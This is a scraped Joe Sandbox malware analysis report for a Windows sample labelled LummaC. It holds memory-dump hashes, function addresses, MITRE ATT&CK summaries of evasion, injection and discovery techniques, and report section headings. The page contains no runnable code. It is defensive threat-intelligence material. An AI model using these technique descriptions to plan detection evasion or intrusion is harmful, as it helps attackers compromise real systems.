Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10

Function 057C9EE0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47064e9a662683c235d3fcd2583867cd58b4d22b6d9965287d3d04ce81ba900e
Instruction ID: 9efa477b48460f95dce5ea4b5b16a4a63602beac721f47069bb21e244d54a147
Opcode Fuzzy Hash: 47064e9a662683c235d3fcd2583867cd58b4d22b6d9965287d3d04ce81ba900e
Instruction Fuzzy Hash: FDB0924791E7C01ECB638230CCA85A82FA5483336130B80CFD684CA0A3B0919C1AAB63

Function 0754FCE0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378528163665.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7540000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 05D992B0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378503448825.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5d90000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a68cad6bb204e4896b353808c260a1a07f7adbd1b73f58e4fd3ed816f725a9c
Instruction ID: 0e920269632974cc3535c628dbd3c479a64a277c4ace3a78fc2ed6b5c4b3f04c
Opcode Fuzzy Hash: 6a68cad6bb204e4896b353808c260a1a07f7adbd1b73f58e4fd3ed816f725a9c
Instruction Fuzzy Hash: 51C04C94A241D49FEF295370752E3A82E816785309F8455ECE5455F2C2DF7A34888396

Function 07588CA5 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378531311048.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7580000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c51c5b81c784519b3f8d026ab26db6044bad9fe0d92648f2cfe6355fed8999d6
Instruction ID: f37768c75116fbe72cb8f6fe809709de41a2efc29d37154a095eb22ee378015c
Opcode Fuzzy Hash: c51c5b81c784519b3f8d026ab26db6044bad9fe0d92648f2cfe6355fed8999d6
Instruction Fuzzy Hash: 6EC00274A14508CFDB019A90DD55ADDBBB2FB88302F504095D9056236086366E12DE01

Function 01148660 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378370947660.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1140000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
Instruction ID: e80b9cbb32ce7aa80f269217a2acaa4f8c5de131eb2df65f765f3a476441bad2
Opcode Fuzzy Hash: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
Instruction Fuzzy Hash: 3DB002747054005B8748D65DD951515A7D29BC9215728C4AD641DC7355DE22DD039644

Function 057C9D6B Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb5583d8475a49b84a93653a09e78eac1a8657084367a507daa6ce87a3122d9e
Instruction ID: 2a1a6755130371a5da445e03c0c68d09f70b00e4be86a72afcbed57ea9a352d4
Opcode Fuzzy Hash: fb5583d8475a49b84a93653a09e78eac1a8657084367a507daa6ce87a3122d9e
Instruction Fuzzy Hash: 79B012362060004B8344D608CC81404B361DBC4206318C0ACA408CB305CF33D8039540

Function 057C92BB Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04b8e489c33751b7616c00fce8de8bc9835db21543bc3e8ddb3a920c28788d07
Instruction ID: df5ffa574732ba28c28bc3db70e3095db283db34d28903486c914d195b5eaaa9
Opcode Fuzzy Hash: 04b8e489c33751b7616c00fce8de8bc9835db21543bc3e8ddb3a920c28788d07
Instruction Fuzzy Hash: B8B012312040004B928CF608C941414B351DFC424971CC09C6808CB305CF33E9038640

Function 075494C0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378528163665.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7540000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d85c1befb7f3272b5733bf2e8bc22384ca042569b4e4a5f86265a4d4dec3be6
Instruction ID: 6d3416a7cc47151344117926580a461b3f55a5d328ab5ab0498e370a652c367e
Opcode Fuzzy Hash: 7d85c1befb7f3272b5733bf2e8bc22384ca042569b4e4a5f86265a4d4dec3be6
Instruction Fuzzy Hash: 46A012300002089F85405745F805452775C97445153004054E00D021524B92B8058680

Function 05D9709B Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378503448825.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5d90000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227b3a7c8f47caa018284955123da5605e59c988f9be2f27816eb7ab33fa2a8d
Instruction ID: e58bf66a994d22884345ff63cb6335199b0fd263f229d2278679b02682b4bebd
Opcode Fuzzy Hash: 227b3a7c8f47caa018284955123da5605e59c988f9be2f27816eb7ab33fa2a8d
Instruction Fuzzy Hash: 2EB012312040009F8344D60CC881404B761DFC4205318C4DC7419CB345CF33E9038A44

Function 057E8180 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378494334830.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57e0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 057E3370 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378494334830.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57e0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 07593888 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378532071830.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7590000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be604b6582dcad5a6193af801bf40fabc8fe820cc341c75063207d4230ebc911
Instruction ID: 4662f02a047a22f2bac51438a1c38981a31df62eb1ecfe5d266599385161fda7
Opcode Fuzzy Hash: be604b6582dcad5a6193af801bf40fabc8fe820cc341c75063207d4230ebc911
Instruction Fuzzy Hash: D7B09278A10018DFCF0A8F01E85889E7B32BF46340F108010FC1616260CB319812CA40

Function 075DDCF0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378533200372.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_75d0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 075D5FC8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378533200372.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_75d0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9664f26b4985fcc53e1d358d2b5d1e2bb9903bb22f3587abeb0875d67f5c3ea
Instruction ID: 3ec72c49c52e12a7e7316fbd2fa64762c34ee7cc9b3bfd7b9c777287b3ce7a72
Opcode Fuzzy Hash: c9664f26b4985fcc53e1d358d2b5d1e2bb9903bb22f3587abeb0875d67f5c3ea
Instruction Fuzzy Hash: EEB092B8040142CFD210EA08D10DBA83AE2B748206F8400A2E0054B65487341840CE10

Function 011408B0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378370947660.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1140000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db216fe3481a5d49e1b3488aa6d668c134bb616e2e98f2ee5abf310fa80ae690
Instruction ID: 6871cd196a0f3a4ecbdc13914910930d81339796ef44ed2a5bbbcb16fb448fa5
Opcode Fuzzy Hash: db216fe3481a5d49e1b3488aa6d668c134bb616e2e98f2ee5abf310fa80ae690
Instruction Fuzzy Hash: 4690023104470C8F494C27967809555B79C96446167C04851B50D535165A6664144595

Function 01146790 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378370947660.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1140000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e82e1d09c65e213d7c656d605319ceacc02855c9d0effda5f001a317832ce17
Instruction ID: dc9d3d4686e72fc592b1a89ff4d3a277001129c36aa77d16afa8c2e569fc6014
Opcode Fuzzy Hash: 4e82e1d09c65e213d7c656d605319ceacc02855c9d0effda5f001a317832ce17
Instruction Fuzzy Hash: 0790223000020C8B02003382300800033CEE0000023800000A00C000000A0838008080

Function 0114F640 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378370947660.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1140000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 056C6FB0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378488387919.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 057CB4F0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 057C9EF0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 05D98C70 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378503448825.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5d90000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c30e0e9fcbaf1d5d8c22c64fd026a32cf74f1a7ef374bd60638712000b6be25
Instruction ID: 81ec8a76a02ea625d745279bd9d91947a8a9fe8c6b4bd4401d0ddb10fc9b4aab
Opcode Fuzzy Hash: 0c30e0e9fcbaf1d5d8c22c64fd026a32cf74f1a7ef374bd60638712000b6be25
Instruction Fuzzy Hash: 9790023105460DCB4641279A740A555BF5C95495157904051F54D865025E66B8208599

Function 056C0540 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378488387919.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Function 05D92C70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378503448825.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5d90000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Function 056C1133 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378488387919.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
Instruction ID: aa7568471c24b642ca0eef57f97030f7351818590365929177f3ff10fe4176df
Opcode Fuzzy Hash: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
Instruction Fuzzy Hash:

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PT54FFSL7ET46RASB.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Bitcoin Miner

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

